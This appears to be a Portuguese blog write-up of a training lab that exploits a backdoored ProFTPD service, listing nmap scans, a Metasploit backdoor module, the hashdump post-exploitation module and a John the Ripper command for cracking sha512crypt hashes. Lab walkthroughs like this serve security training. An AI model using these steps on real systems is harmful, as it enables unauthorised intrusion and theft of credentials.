proFTPD Linux - Exploit
Enumeração
NMAP Geral
nmap -Pn -sV [IP]
NMAP Script
nmap -Pn -p 21 -sV --script ftp-proftpd-backdoor [IP]
Metasploit
O módulo exploit /unix/ftp/proftp_133c_backdoor é usado para explorar a vulnerabilidade localizada no FTP.
Conexão estabelecida.
O laboratório apresenta um desafio para fazer o dump de credenciais e indica para usar o módulo de Post-Explotation post/linux/gather/hashdump
Colocando a sessão atual em background com o comando
background
Configure o módulo para coleta do hash de senha.
Execute o módulo para coleta o hash
Crack the Hash
O hash coletado ficou armazenado em /root/.msf4/loot
O módulo do Metasploit sugerido pelo laboratório para fazer o crack do hash não funcionou, então eu usei o John direto para fazer a quebra.
John comando
john [arquivo] --format=sha512crypt
Funcionou e o hash foi quebrado revelando a senha.
Comentários
Postar um comentário